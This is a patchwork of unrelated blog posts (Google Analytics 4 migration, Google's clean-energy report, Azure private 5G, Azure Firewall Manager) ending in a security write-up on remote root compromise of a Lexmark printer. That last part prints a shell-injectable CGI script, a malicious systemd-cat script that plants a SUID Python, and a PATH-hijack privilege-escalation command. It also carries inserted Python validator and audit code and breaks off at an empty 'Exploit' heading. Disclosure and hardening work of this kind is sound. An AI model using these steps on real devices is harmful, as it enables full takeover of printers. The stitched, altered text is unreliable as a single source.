In UA, you could connect your website’s URL to a view. UA views are mostly used to filter data. So for instance, you can create a filter in a UA view to exclude certain IP addresses from reports.

GA4 uses data streams instead. You’ll need to connect your website’s URL to a data stream.

But don’t be mistaken, they are not the same as views.

Also, you can’t create a filter in GA4. In case your property was converted from UA to GA4, then you can find a read-only list of UA filters under Admin » Account » All Filters.

Read-only UA view filters

Now Google defines a data stream as:

“A flow of data from your website or app to Analytics. There are 3 types of data stream: Web (for websites), iOS (for iOS apps), and Android (for Android apps).”

You can use your data stream to find your measurement ID and global site tag code snippet. You can also enable enhanced measurements such as your page views, scrolls, and outbound clicks.

data streams in ga4

In a data stream, you can do the following:

  • Set up a list of domains for cross-domain tracking
  • Create a set of rules that define internal traffic
  • Put together a list of domains to exclude from tracking

Data streams will make a lot of things easier. But there are 2 things that you need to be aware of. First, once you create a data stream, there’s no way to edit it. And if you delete a data stream, you can’t undo this action.

Events vs. Hit Types

UA tracks data by hit types; a hit is essentially an interaction that results in data being sent to Analytics. This includes page hits, event hits, eCommerce hits, and social interaction hits.

GA4 moves away from the concept of hit types. Instead, it’s event-based, meaning every interaction is captured as an event. Page views, events, eCommerce transactions, social interactions, and app views are all captured as events.

There’s also no option for creating conversion goals. But GA4 lets you flag or mark an event as a conversion with the flip of a toggle switch.

Toggle conversions on in GA4

This is essentially the same thing as creating a conversion goal in Universal Analytics. You can also create new conversion events ahead of time before those events actually take place.

In GA4, Google organizes events into 4 categories and recommends that you use them in this order:

1. Automatically collected

In the first event category, there’s no setting to turn on, so you don’t need to activate anything. Google will automatically collect data on these events:

  • first_visit – the first visit to a website or Android instant app
  • session_start – the time when a visitor opens a web page or app
  • user_engagement – when a session lasts longer than 10 seconds, has 1 or more conversions, or has 2 or more page views

Keep in mind that we’re only at the start of GA4. With Google’s ever-advancing machine-learning technology, more automatically collected events may be added as the platform progresses.

2. Enhanced measurement

In this section, you don’t need to write any code but there are settings to turn on enhanced measurements. This will give you an extra set of automatically collected events.

To enable this data collection, you need to turn on the Enhanced measurement setting in your Data Stream.

enhanced measurement in ga4

Then you’ll see more enhanced measurement events that include:

  • page_view: a page-load in the browser or a browser history state change
  • click: a click on an outbound link that goes to an external site
  • file_download: a click that triggers a file download
  • scroll: the first time a visitor scrolls to the bottom of a page

3. Recommended

These GA4 events are recommended but aren’t automatically collected in GA4 so you’ll need to enable them if you want to track them.

We suggest you check out what is in the recommended events and turn on tracking for what you need. This can include signups, logins, and purchases.

Before we move on to custom events: if the event you want to track isn’t covered by these 3 event types – automatically collected, enhanced measurement, and recommended – you should create a custom event for it.

4. Custom

Custom events let you set up tracking for any event that doesn’t fall into the above 3 categories. You can create and modify your events. So for instance, you can create custom events to track menu clicks.

You can design and write custom code to enable tracking for the event you want. But there is no guarantee that Google will support your custom metrics and events.

No Bounce Rate

The bounce rate metric has vanished! It’s been suggested that Google wants to focus on users that stay on your website rather than the ones that leave.

So this has likely been replaced with engagement rate metrics to collect more data on user interactions and engaged sessions.

No Custom Reports

UA properties have a customization menu for options to create dashboards, create custom reports, save existing reports, and create custom alerts.

A lot of this has changed in GA4. To make it easier for you to understand, here are the UA customization options and their GA4 equivalents:

  • Custom reports can be found in the Explorations page.
  • Saved reports are automatically created when you run an Exploration.
  • Custom alerts can be set up inside custom Insights from the GA4 home page.

One more thing to note is that you also won’t find a way to link Google Search Console with a GA4 property (at the time of writing). And that’s all the key differences between Universal Analytics and Google Analytics 4.

Now you may be wondering whether you HAVE TO make the switch to GA4. A lot of our users have been asking us this question so we’ll tell you quickly what you need to do.

Do I Have To Switch to GA4?

Google will retire Universal Analytics in July 2023. You’ll have access to your UA data for some time, but all new data will flow into GA4. If you have a UA property set up, you’ll see this warning in your dashboard:

universal analytics warning

So you have to set up a GA4 property sooner or later and we recommend that you do it sooner. This is because your UA data won’t be transferred to GA4. You have to start afresh.

You can set up your GA4 property now and let it collect data. In the meantime, you can continue to use Universal Analytics and use the time to learn the new GA4 platform. Then when we’re all forced to make the switch, you’ll have plenty of historical data in your GA4 property.

If you haven’t set up your Google Analytics 4 property yet, we’ve compiled an easy step-by-step guide for you: How to Set Up Google Analytics 4 in WordPress.

Want to skip the guide and use a tool? Then MonsterInsights is the best to set up GA4. It even lets you create dual tracking profiles so you can have both UA and GA4 running simultaneously.


After setting up GA4, you can go deeper into your data with these guides:

These posts will help you track your users and their activity on your site so that you can get more valuable insights and analytics data to improve your site’s performance.

Source :
https://www.isitwp.com/google-analytics-4-vs-universal-analytics/

Five years of 100% renewable energy – and a look ahead to a 24/7 carbon-free future

Google operates the cleanest cloud in the industry, and we have long been a leading champion of clean energy around the world. Since we began purchasing renewable energy in 2010, Google has been responsible for more than 60 new clean energy projects with a combined capacity of over 7 gigawatts — about the same as 20 million solar panels. Our long-term support for clean energy projects has contributed to the rapid growth of the industry, remarkable declines in the cost of solar and wind power, and innovative new contracting models and industry partnerships to accelerate corporate clean energy procurement.

Chart: Global corporate PPA volumes (June 2022)

In 2021, we were the only major cloud provider to match 100% of the electricity consumption of our operations with renewable energy purchases – a goal we’ve accomplished for the past five years. This establishes Google Cloud as the cleanest cloud in the industry, and is particularly exciting given the rapid expansion of computing conducted in our data centers over the same period. This required significantly ramping up our global renewable energy purchasing: in 2021 alone we signed agreements to buy power from new renewable energy projects with a combined capacity of nearly 1300 MW – expanding our global portfolio by almost 25%.

A new frontier: 24/7 Carbon-Free Energy

Matching our annual energy consumption with renewable energy purchases has been an important step in our sustainability journey, but there are still regions and times of day where clean energy is unavailable and we are forced to rely on fossil fuels to meet our electricity needs. That is why we are now working towards our moonshot goal of operating on 24/7 carbon-free energy (CFE) by 2030, the last step in our journey to fully decarbonize Google’s global operations.


Operating on 24/7 CFE is a far more complex and technically challenging goal than matching our annual global energy use with renewable energy purchases. It means matching our electricity demand with carbon-free energy supply every hour of every day, in every region where we operate. No company has achieved this before, and there is no playbook for achieving this.

In the spirit of transparency, today we are releasing the 2021 carbon-free energy percentages (CFE%) for each of Google’s data centers. Globally, Google operated at 66% CFE in 2021 – 5% higher than 2019, but 1% lower than 2020. We expected this kind of short-term fluctuation: building new clean energy is a multi-year process, and our near-term priority is to build strong foundations for long-term CFE growth.

Map: 2021 CFE% clocks by data center (global)

Our largest percentage increases were at our data centers in Chile, at 4%, and Ohio and Virginia, at 4%. In other regions, we encountered significant new headwinds, including a lack of available renewable energy supply and delays to CFE construction due to supply chain disruptions and interconnection challenges. Notably, we also saw flat or declining CFE percentages on the majority of the grids where we operate, underscoring the need for more ambitious action to accelerate grid-level decarbonization everywhere. This is an enormous challenge that requires holistic and long-term solutions, and we are working with our partners across government, industry, and civil society to build a global movement to drive progress at the speed and scale required.

As we work to operate on 24/7 carbon-free energy by 2030, we remain confident in our long-term trajectory and are increasing our focus on regions and times of day where carbon-free energy is not readily available due to resource constraints, policy barriers, or market obstacles. We are building solutions to fill these gaps, including: 

  • New approaches to buying diverse portfolios of carbon-free energy
  • Projects to advance next-generation technologies like geothermal and batteries
  • A first-of-its kind carbon-intelligent computing platform to maximize the reduction in grid-level CO2 emissions
  • Advanced methods for tracking clean energy and maximizing the economic value of clean energy projects
  • Expanded efforts to advocate for public policies that accelerate grid-level decarbonization 

Getting to 24/7 CFE won’t be easy, but we’re optimistic for the future. Our CFE goal is part of our third decade of climate action and company goal of reaching net-zero emissions across our operations and value chain, including our consumer hardware products, by 2030. We aim to reduce the majority of our emissions (versus our 2019 baseline) before 2030, and plan to invest in carbon removal solutions to neutralize our remaining emissions. 

We will continue to share our progress and lessons as we work towards our goal, and to work with our partners to accelerate the global transition to a prosperous, carbon-free future.

Source :
https://cloud.google.com/blog/topics/sustainability/5-years-of-100-percent-renewable-energy

Azure powers rapid deployment of private 4G and 5G networks

As the cloud continues to expand into a ubiquitous and highly distributed fabric, a new breed of application is emerging: Modern Connected Applications. We define these new offerings as network-intelligent applications at the edge, powered by 5G, and enabled by programmable interfaces that give developers access to network resources. Along with the internet of things (IoT) and real-time AI, 5G is enabling this new app paradigm, unlocking new services and business models for enterprises while accelerating their network and IT transformation.

At Mobile World Congress this year, Microsoft announced a significant step towards helping enterprises in this journey: Azure Private 5G Core, available as a part of the Azure private multi-access edge compute (MEC) solution. Azure Private 5G Core enables operators and system integrators (SIs) to provide a simple, scalable, and secure deployment of private 4G and 5G networks on small footprint infrastructure, at the enterprise edge.

This blog dives a little deeper into the fundamentals of the service and highlights some extensions that enterprises can leverage to gain more visibility and control over their private network. It also includes a use case of an early deployment of Azure Kubernetes Services (AKS) on an edge platform, leveraged by the Azure Private 5G Core to rapidly deploy such networks.

Building simple, scalable, and secure private networks

Azure Private 5G Core dramatically simplifies the deployment and operation of private networks. With just a few clicks, organizations can deploy a customized set of selectable 5G core functions, radio access network (RAN), and applications on a small edge-compute platform, at thousands of locations. Built-in automation delivers security patches, assures compliance, and performs audits and reporting. Enterprises benefit from a consistent management experience and improved service assurance experience, with all logs and metrics from cloud to edge available for viewing within Azure dashboards.

Enterprises need the highest level of security to connect their mission critical operations. Azure Private 5G Core makes this possible by natively integrating into a broad range of Azure capabilities. With Azure Arc, we provide seamless and secure connectivity from an on-premises edge platform into the Azure cloud. With Azure role-based access control (RBAC), administrators can author policies and define privileges that will allow an application to access all necessary resources. Likewise, users can be given appropriate access to manage all resources in a resource group, such as virtual machines, websites, and subnets. Our Zero Trust security frameworks are integrated from devices to the cloud to keep users and data secure. And our complete, “full-stack” solution (hardware, host and guest operating system, hypervisor, AKS, packet core, IoT Edge Runtime for applications, and more) meets standard Azure privacy and compliance benchmarks in the cloud and on the enterprise edge, meaning that data privacy requirements are adhered to in each geographic region.

Deploying private 5G networks in minutes

Microsoft partner Inventec is a leading design manufacturer of enterprise-class technology solutions like laptops, servers, and wireless communication products. The company has been quick to see the potential benefit in transforming its own world-class manufacturing sites into 5G smart factories to fully utilize the power of AI and IoT.

In a compelling example of rapid private 5G network deployment, Inventec recently installed our Azure private MEC solution in their Taiwan smart factory. It took only 56 minutes to fully deploy the Azure Private 5G Core and connect it to 5G access points that served multiple 5G endpoints—a significant reduction from the months that enterprises have come to expect. Azure Private 5G Core leverages Azure Arc and Azure Kubernetes Service on-prem to provide security and manageability for the entire core network stack. Figures 1 and 2 below show snapshots from the trial.

Logs with time stamps showing start and completion of the core network deployment.

Figure 1: Screenshot of logs with time stamps showing start and completion of the core network deployment.

Trial showing one access point successfully connected to seven endpoints.

Figure 2: Screenshot from the trial showing one access point successfully connected to seven endpoints.

Inventec is developing applications for manufacturing use-cases that leverage private 5G networks and Microsoft’s Azure Private 5G Core. Examples of these high-value MEC use cases include Automatic Optical Inspection (AOI), facial recognition, and security surveillance systems.

Extending enterprise control and visibility from the 5G core

Through close integration with other elements of the Azure private MEC solution, our Azure Private 5G Core essentially acts as an enterprise “control point” for private wireless networks. Through comprehensive APIs, the Azure Private 5G Core can extend visibility into the performance of connected network elements, simplify the provisioning of subscriber identity modules (SIMs) for end devices, secure private wireless deployments, and offer 5G connectivity between cloud services (like IoT Hub) and associated on-premises devices.

Azure Private 5G Core is a central control point for private wireless networks.

Figure 3: Azure Private 5G Core is a central control point for private wireless networks.

Customers, developers, and partners are finding value today with a number of early integrations with both Azure and third-party services that include:

  • Plug and play RAN: Azure private MEC offers a choice of 4G or 5G Standalone radio access network (RAN) partners that integrate directly with the Azure Private 5G Core. By integrating RAN monitoring with the Azure Private 5G Core, RAN performance can be made visible through the Azure management portal. Our RAN partners are also onboarding their Element Management System (EMS) and Service Management and Orchestrator (SMO) products to Azure, simplifying deployment processes and providing a framework for closed-loop radio performance automation.
  • Azure Arc managed edge: The Azure Private 5G Core takes advantage of the security and reliability capabilities of Azure Arc-enabled Azure Kubernetes Service running on Azure Stack Edge Pro. These include policy definitions with Azure Policy for Kubernetes, simplified access to AKS clusters for High Availability with Cluster Connect and fine-grained identity and access management with Azure RBAC. 
  • Device and Profile Management: Azure Private 5G Core APIs integrate with SIM management services to securely provision the 5G devices with appropriate profiles. In addition, integration with Azure IoT Hub enables unified management of all connected IoT devices across an enterprise and provides a message hub for IoT telemetry data. 
  • Localized ISV MEC applications: Low-latency MEC applications benefit from running side-by-side with core network functions on the common (Azure private MEC) edge-compute platform. By integrating tightly with the Azure Private 5G Core using Azure Resource Manager APIs, third-party applications can configure network resources and devices. Applications offered by partners are available in, and deployable from, the Azure Marketplace.

It’s easy to get started with Azure private MEC

As innovative use cases for private wireless networks continue to develop and industry 4.0 transformation accelerates, we welcome ISVs, platform partners, operators, and SIs to learn more about Azure private MEC.

  • Application ISVs interested in deploying their industry or horizontal solutions on Azure should begin by onboarding their applications to Azure Marketplace.
  • Platform partners, operators, and SIs interested in partnering with Microsoft to deploy or integrate with private MEC can get started by reaching out to the Azure private MEC Team.

Microsoft is committed to helping organizations innovate from the cloud, to the edge, and to space—offering the platform and ecosystem strong enough to support the vision and vast potential of 5G. As the cloud continues to expand and a new breed of modern connected apps at the edge emerges, the growth and transformation opportunities for enterprises will be profound. Learn more about how Microsoft is helping developers embrace 5G.

Source :
https://azure.microsoft.com/en-us/blog/azure-powers-rapid-deployment-of-private-4g-and-5g-networks/

Simplify and centralize network security management with Azure Firewall Manager

We are excited to share that Azure Web Application Firewall (WAF) policy and Azure DDoS Protection plan management in Microsoft Azure Firewall Manager is now generally available.

With an increasing need to secure cloud deployments through a Zero Trust approach, the ability to manage network security policies and resources in one central place is a key security measure.

You can now centrally manage Azure Web Application Firewall (WAF) policies, which provide Layer 7 application security for your application delivery platforms, Azure Front Door and Azure Application Gateway, across your networks and subscriptions. You can also configure DDoS Protection Standard to protect your virtual networks from Layer 3 and Layer 4 attacks.

Azure Firewall Manager is a central network security policy and route management service that allows administrators and organizations to protect their networks and cloud platforms at scale, all in one central place.

Azure Web Application Firewall is a cloud-native web application firewall (WAF) service that provides powerful protection for web apps from common hacking techniques such as SQL injection and security vulnerabilities such as cross-site scripting.

Azure DDoS Protection Standard provides enhanced Distributed Denial-of-Service (DDoS) mitigation features to defend against DDoS attacks. It is automatically tuned to protect all public IP addresses in virtual networks. Protection is simple to enable on any new or existing virtual network and does not require any application or resource changes. 

Using both WAF policies and DDoS Protection in your network provides multi-layered protection across all your essential workloads and applications.

WAF policy and DDoS Protection plan management are an addition to Azure Firewall management in Azure Firewall Manager.

Centrally protect your application delivery platforms using WAF policies

In Azure Firewall Manager, you can now manage and protect your Azure Front Door or Application Gateway deployments by associating WAF policies, at scale. This allows you to view all your key deployments in one central place, alongside Azure Firewall deployments and DDoS Protection plans.

Figure 1: Associating a WAF policy to an Azure Front Door

Upgrade from WAF configuration to WAF policy

In addition, the platform lets administrators upgrade from a WAF configuration to WAF policies for Application Gateways by selecting the service and then Upgrade from WAF configuration. This makes migrating to WAF policies more seamless; WAF policies support policy settings, managed rule sets, exclusions, and disabled rule groups.

Note that everything previously configured through a WAF configuration in Application Gateway can also be done through a WAF policy.

Figure 2: Upgrading a WAF configuration to WAF policy

Manage DDoS Protection plans for your virtual networks

You can enable DDoS Protection Standard on the virtual networks listed in Azure Firewall Manager, across subscriptions and regions. This lets you see in a single place which virtual networks have Azure Firewall, DDoS protection, or both.

Figure 3: Enabling DDoS Protection Standard on a virtual network in Azure Firewall Manager

View and create WAF policies and DDoS Protection Plans in Azure Firewall Manager

You can view and create WAF policies and DDoS Protection Plans from the Azure Firewall Manager experience, alongside Azure Firewall policies.

In addition, you can import existing WAF policies to create a new WAF policy, so you do not need to start from scratch if you want to maintain similar settings.

Figure 4: View of Web Application Firewall Policies in Azure Firewall Manager
Figure 5: View of DDoS Protection Plans in Azure Firewall Manager

Monitor your overall network security posture

Azure Firewall Manager provides monitoring of your overall network security posture. Here, you can easily see which virtual networks and virtual hubs are protected by Azure Firewall, a third-party security provider, or DDoS Protection Standard. This overview can help you identify and prioritize any security gaps that are in your Azure environment, across subscriptions or for the whole tenant.

Figure 6: Monitoring page in Azure Firewall Manager

Coming soon, you’ll also be able to view your Application Gateway and Azure Front Door monitors, for a full network security overview.

Learn more

To learn more about these features in Azure Firewall Manager, visit the Manage Web Application Firewall policies tutorial, WAF on Application Gateway documentation, and WAF on Azure Front Door documentation. For DDoS information, visit the Configure Azure DDoS Protection Plan using Azure Firewall Manager tutorial and Azure DDoS Protection documentation.

To learn more about Azure Firewall Manager, please visit the Azure Firewall Manager home page.

Source :
https://azure.microsoft.com/en-us/blog/simplify-and-centralize-network-security-management-with-azure-firewall-manager/

For the Common Good: How to Compromise a Printer in Three Simple Steps

In August 2021, ZDI announced Pwn2Own Austin 2021, a security contest focusing on phones, printers, NAS devices and smart speakers, among other things. The Pwn2Own contest encourages security researchers to demonstrate remote zero-day exploits against a list of specified devices. If successful, the researchers are rewarded with a cash prize, and the leveraged vulnerabilities are responsibly disclosed to the respective vendors so they can improve the security of their products.

After reviewing the list of devices, we decided to target the Cisco RV340 router and the Lexmark MC3224i printer, and we managed to identify several vulnerabilities in both of them. Fortunately, we were luckier than last year and were able to participate in the contest for the first time. By successfully exploiting both devices, we won $20,000 USD, which CrowdStrike donated to several charitable organizations chosen by our researchers.

In this blog post, we outline the vulnerabilities we discovered and used to compromise the Lexmark printer.

Overview

Product: Lexmark MC3224
Affected Firmware Versions (without claim for completeness): CXLBL.075.272 (2021-07-29), CXLBL.075.281 (2021-10-14)
Fixed Firmware Version: CXLBL.076.294 (CVE-2021-44735). Note: Users must implement a workaround to address CVE-2021-44736, see Lexmark Security Alert
CVE: CVE-2021-44735 (Shell Command Injection), CVE-2021-44736 (Authentication Reset)
Root Causes: Authentication Bypass, Shell Command Injection, Insecure SUID Binary
Impact: Unauthenticated Remote Code Execution (RCE) as root
Researchers: Hanno Heinrichs, Lukas Kupczyk
Lexmark Resources: https[:]//publications.lexmark[.]com/publications/security-alerts/CVE-2021-44735.pdf
https[:]//publications.lexmark[.]com/publications/security-alerts/CVE-2021-44736.pdf

Step #1: Increasing Attack Surface via Authentication Reset

Before we could start our analysis, we first had to obtain a copy of the firmware. It quickly turned out that the firmware is shipped as an .fls file in a custom binary format containing encrypted data. Luckily, a detailed writeup on the encryption scheme had been published in September 2020. While the writeup did not include code or cryptographic keys, it was elaborate enough that we were able to quickly reproduce it and write our own decrypter. With our firmware decryption tool at hand, we were finally able to peek into the firmware.

It was assumed that the printer would be in its default configuration during the contest and that the setup wizard had been completed. Thus, we expected the administrator password to be set to an unknown value. In this state, unauthenticated users can still trigger a large number of actions through the web interface. One of these is “Sanitize all information on nonvolatile memory”, found under Settings -> Device -> Maintenance. There are several options to choose from when performing that action:

[x] Sanitize all information on nonvolatile memory
  (x) Start initial setup wizard
  ( ) Leave printer offline
[x] Erase all printer and network settings
[x] Erase all shortcuts and shortcut settings

[Start] [Reset]

If the checkboxes are ticked as shown, the process can be initiated through the Start button. The printer’s non-volatile memory will be cleared and a reboot is initiated. This process takes approximately two minutes. Afterward, unauthenticated users can access all functions through the web interface.

Step #2: Shell Command Injection

After resetting the nvram as outlined in the previous section, the CGI script https://target/cgi-bin/sniffcapture_post becomes accessible without authentication. It was previously discovered by browsing the decrypted firmware and is located in the directory /usr/share/web/cgi-bin.

At the beginning of the script, the supplied POST body is stored in the variable data. Afterward, several other variables, such as interface, dest, path and filter, are extracted from that data using sed:

read data

remove=${data/*-r*/1}
if [ "x${remove}" != "x1" ]; then
    remove=0
fi
interface=$(echo ${data} | sed -n 's|^.*-i[[:space:]]\([^[:space:]]\+\).*$|\1|p')
dest=$(echo ${data} | sed -n 's|^.*-f[[:space:]]\([^[:space:]]\+\).*$|\1|p')
path=$(echo ${data} | sed -n 's|^.*-f[[:space:]]\([^[:space:]]\+\).*$|\1|p')
method="startSniffer"
auto=0
if [ "x${dest}" = "x/dev/null" ]; then
    method="stopSniffer"
elif [ "x${dest}" = "x/usr/bin" ]; then
    auto=1
fi
filter=$(echo ${data} | sed -n 's|^.*-F[[:space:]]\+\(["]\)\(.*\)\1.*$|\2|p')
args="-i ${interface} -f ${dest}/sniff_control.pcap"

The variable filter is determined by a quoted string following the -F option in the POST body. As shown below, it is later embedded into the args variable if it has been specified together with an interface:

fmt=""
args=""
if [ ${remove} -ne 0 ]; then
    fmt="${fmt}b"
    args="${args} remove 1"
fi
if [ -n "${interface}" ]; then
    fmt="${fmt}s"
    args="${args} interface ${interface}"
    if [ -n "${filter}" ]; then
        fmt="${fmt}s"
        args="${args} filter \"${filter}\""
    fi
    if [ ${auto} -ne 0 ]; then
        fmt="${fmt}b"
        args="${args} auto 1"
    else
        fmt="${fmt}s"
        args="${args} dest ${dest}"
    fi
fi
[...]

At the end of the script, the resulting args value is used in an eval statement:

[...]
resp=""
if [ -n "${fmt}" ]; then
    resp=$(eval rob call system.sniffer ${method} "{${fmt}}" ${args:1} 2>/dev/null)
    submitted=1
[...]

By controlling the filter variable, attackers are therefore able to inject further shell commands and gain access to the printer as uid=985(httpd), which is the user that the web server is executed as.
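To show exactly where the injection sits and what a server-side check would have to reject, here is an added example (our own illustration, not CrowdStrike's exploit code and not Lexmark's patched script). It re-implements the script's sed-based parsing in Python and then validates each value that reaches eval against a strict allowlist. The allowlist patterns are assumptions; interface and dest are checked in addition to filter because all three end up in the string that eval re-parses.

```python
import re

# Python equivalents of the sed expressions in sniffcapture_post. Like sed's
# greedy "^.*-x", they pick the LAST occurrence of each option in the body.
_INTERFACE_RE = re.compile(r"^.*-i\s(\S+)")
_DEST_RE = re.compile(r"^.*-f\s(\S+)")
_FILTER_RE = re.compile(r'^.*-F\s+(")(.*)\1.*$')

# Allowlists for the three values that end up inside `eval`. They cover what a
# capture filter ("tcp port 80 and not host 10.0.0.1"), an interface name and a
# destination directory need, and exclude everything the shell re-parses
# (quotes, $, backticks, ; | & ( ) ...). Assumptions for illustration only.
_SAFE_FILTER_RE = re.compile(r"^[A-Za-z0-9 ._:/-]*$")
_SAFE_NAME_RE = re.compile(r"^[A-Za-z0-9_.-]+$")
_SAFE_PATH_RE = re.compile(r"^[A-Za-z0-9_./-]+$")


def _group(regex, text, n):
    m = regex.match(text)
    return m.group(n) if m else ""


def parse_sniffcapture_body(data):
    """Derive the script's variables from the POST body the way the CGI does."""
    fields = {
        "remove": 1 if "-r" in data else 0,       # remove=${data/*-r*/1}
        "interface": _group(_INTERFACE_RE, data, 1),
        "dest": _group(_DEST_RE, data, 1),
        "filter": _group(_FILTER_RE, data, 2),
        "auto": 0,
        "method": "startSniffer",
    }
    if fields["dest"] == "/dev/null":
        fields["method"] = "stopSniffer"
    elif fields["dest"] == "/usr/bin":
        fields["auto"] = 1
    return fields


def inspect_request(data):
    """Allow the request only if every value that reaches eval is clean.

    Returns {"verdict": "allow"|"reject", "parsed": fields[, "field", "value"]}.
    """
    fields = parse_sniffcapture_body(data)
    for name, allowed in (("interface", _SAFE_NAME_RE),
                          ("dest", _SAFE_PATH_RE),
                          ("filter", _SAFE_FILTER_RE)):
        value = fields[name]
        if value and not allowed.match(value):
            return {"verdict": "reject", "field": name, "value": value,
                    "parsed": fields}
    return {"verdict": "allow", "parsed": fields}


if __name__ == "__main__":
    # Constructed sample bodies: one legitimate capture request and one that
    # closes the quoted filter early, the shape of the injection described above.
    for body in ('-i eth0 -f /tmp -F "tcp port 80 and not host 10.0.0.1"',
                 '-i eth0 -f /tmp -F "tcp"; id; echo ""'):
        print(inspect_request(body))
```

Rejecting a request whose verdict is reject, or better, replacing eval with a direct invocation that passes each value as a separate argument, closes the injection path; the same allowlist is also what a WAF rule or a log-based detection can apply to POST bodies sent to this CGI.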

Step #3: Privilege Escalation

The printer ships a custom root-owned SUID binary called collect-selogs-wrapper:

# ls -la usr/bin/collect-selogs-wrapper
-rwsr-xr-x. 1 root root 7324 Jun 14 15:46 usr/bin/collect-selogs-wrapper

In its main() function, the effective user ID (0) is retrieved and the process’s real user ID is set to that value. Afterward, the shell script /usr/bin/collect-selogs.sh is executed:

#include <stdio.h>
#include <unistd.h>

/* Decompiled main() of collect-selogs-wrapper, reconstructed as compilable C. */
int main(int argc, const char **argv, const char **envp)
{
  uid_t euid;

  euid = geteuid();            /* 0 when the SUID bit is honoured */
  if ( setuid(euid) )          /* real UID := effective UID, so the shell keeps root */
    perror("setuid");
  /* argv and the environment (including PATH) are passed through unchanged */
  return execv("/usr/bin/collect-selogs.sh", (char *const *)argv);
}

Effectively, the shell script is executed as root with UID=EUID, and therefore the shell does not drop privileges. Furthermore, argv[] of the SUID binary is passed to the shell script. As the environment variables are also retained across the execv() call, an attacker is able to specify a malicious $PATH value. Any command inside the shell script that is not referenced by its absolute path can thereby be detoured by the attacker.

The first opportunity for such an attack is the invocation of systemd-cat inside sd_journal_print():

# cat usr/bin/collect-selogs.sh
#!/bin/sh
# Collects fwdebug from the current state plus the last 3 fwdebug files from
# previous auto-collections. The collected files will be archived and compressed
# to the requested output directory or to the standard output if the output
# directory is not specified.

sd_journal_print() {
    systemd-cat -t collect-selogs echo "$@"
}

sd_journal_print "Start! params: '$@'"

[...]

The /dev/shm directory can be used to prepare a malicious version of systemd-cat:

$ cat /dev/shm/systemd-cat
#!/bin/sh
mount -o remount,suid /dev/shm
cp /usr/bin/python3 /dev/shm
chmod +s /dev/shm/python3
$ chmod +x /dev/shm/systemd-cat

This script remounts /dev/shm with the suid flag so that SUID binaries can be executed from it. It then copies the system’s Python interpreter to the same directory and enables the SUID bit on it. The malicious systemd-cat copy can be executed as root by invoking the setuid collect-selogs-wrapper binary like this:

$ PATH=/dev/shm:$PATH /usr/bin/collect-selogs-wrapper

The $PATH environment variable is prepended with the /dev/shm directory that hosts the malicious systemd-cat copy. After executing the command, a root-owned SUID-enabled copy of the Python interpreter is located in /dev/shm:

root@ET788C773C9E20:~# ls -la /dev/shm
drwxrwxrwt    2 root     root           100 Oct 29 09:33 .
drwxr-xr-x   13 root     root          5160 Oct 29 09:31 ..
-rwsr-sr-x    1 root     httpd         8256 Oct 29 09:33 python3
-rw-------    1 nobody   nogroup         16 Oct 29 09:31 sem.netapps.rawprint
-rwxr-xr-x    1 httpd    httpd           96 Oct 29 09:33 systemd-cat

The idea behind this technique is to establish a simple way of escalating privileges again later without having to exploit the collect-selogs-wrapper SUID binary a second time. We did not use the Bash binary for this, as the version shipped with the printer seems to ignore the -p flag when running with UID!=EUID.
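The root cause of Step 3, a script run by a SUID wrapper that resolves commands through a caller-controlled PATH, is something a pre-release audit can catch. The following is an added audit helper, our own illustration and not CrowdStrike's or Lexmark's code: it tokenizes a shell script with shlex, reports every command invoked by bare name (and therefore looked up via $PATH), and checks whether the script pins PATH to absolute directories. The keyword and builtin sets and the hardened variant of collect-selogs.sh are assumptions; the complementary fix in the wrapper itself, resetting the environment before execv(), is outside what this audit checks.

```python
import re
import shlex

# Shell keywords and /bin/sh builtins: never looked up through $PATH.
_KEYWORDS = {"if", "then", "else", "elif", "fi", "for", "while", "until", "do",
             "done", "case", "esac", "in", "function", "{", "}", "!"}
_BUILTINS = {"echo", "test", "[", "[[", "read", "cd", "export", "local", "return",
             "exit", "set", "shift", "true", "false", "printf", "unset", "trap", ":"}
# Prefix commands whose next argument is the real command (eval rob ..., nohup sshd ...).
_WRAPPERS = {"eval", "exec", "nohup", "command", "env", "time"}
# Tokens that separate simple commands in shlex's punctuation mode.
_SEPARATORS = {";", ";;", "|", "||", "&", "&&", "(", ")"}

_FUNC_DEF_RE = re.compile(r"^\s*(?:function\s+)?([A-Za-z_]\w*)\s*\(\s*\)")
_ASSIGN_RE = re.compile(r"^[A-Za-z_]\w*=")
# PATH set to absolute directories only (no $PATH reference, no relative entries).
_PATH_PIN_RE = re.compile(r"^\s*(?:export\s+)?PATH=(/[^\s:$]*(?::/[^\s:$]*)*)\s*$", re.M)


def _tokens(line):
    lexer = shlex.shlex(line, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    try:
        return list(lexer)
    except ValueError:                 # unbalanced quotes: crude fallback
        return line.split()


def _simple_commands(tokens):
    current = []
    for tok in tokens:
        if tok in _SEPARATORS:
            if current:
                yield current
            current = []
        else:
            current.append(tok)
    if current:
        yield current


def _command_word(simple):
    """First word of a simple command after keywords, wrappers and VAR=value."""
    for tok in simple:
        if tok in _KEYWORDS or tok in _WRAPPERS or _ASSIGN_RE.match(tok):
            continue
        return tok
    return None


def defined_functions(script_text):
    names = set()
    for line in script_text.splitlines():
        m = _FUNC_DEF_RE.match(line)
        if m:
            names.add(m.group(1))
    return names


def find_path_dependent_commands(script_text):
    """Commands the script invokes by bare name, i.e. resolved through $PATH."""
    funcs = defined_functions(script_text)
    found = set()
    for line in script_text.splitlines():
        if _FUNC_DEF_RE.match(line):
            continue
        for simple in _simple_commands(_tokens(line)):
            word = _command_word(simple)
            if word is None or word in _BUILTINS or word in funcs:
                continue
            if "/" in word or word.startswith("$"):
                continue   # explicit path, or a variable not resolvable statically
            found.add(word)
    return found


def audit_script(script_text):
    return {"path_dependent": sorted(find_path_dependent_commands(script_text)),
            "path_pinned": bool(_PATH_PIN_RE.search(script_text))}


# The script excerpt shown above, and a constructed hardened variant.
COLLECT_SELOGS_SH = """#!/bin/sh
# Collects fwdebug from the current state plus the last 3 fwdebug files.

sd_journal_print() {
    systemd-cat -t collect-selogs echo "$@"
}

sd_journal_print "Start! params: '$@'"
"""

HARDENED_SH = """#!/bin/sh
PATH=/usr/sbin:/usr/bin:/sbin:/bin
export PATH

sd_journal_print() {
    /usr/bin/systemd-cat -t collect-selogs /bin/echo "$@"
}

sd_journal_print "Start! params: '$@'"
"""

if __name__ == "__main__":
    print(audit_script(COLLECT_SELOGS_SH))   # path_dependent: ['systemd-cat'], path_pinned: False
    print(audit_script(HARDENED_SH))         # path_dependent: [], path_pinned: True
```

The tokenizer is deliberately simple (one line at a time, no heredocs or multi-line quoting), which is enough for scripts of the kind shown here; the point is that any non-empty path_dependent list for a script reachable from a SUID binary is a finding.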

Exploit

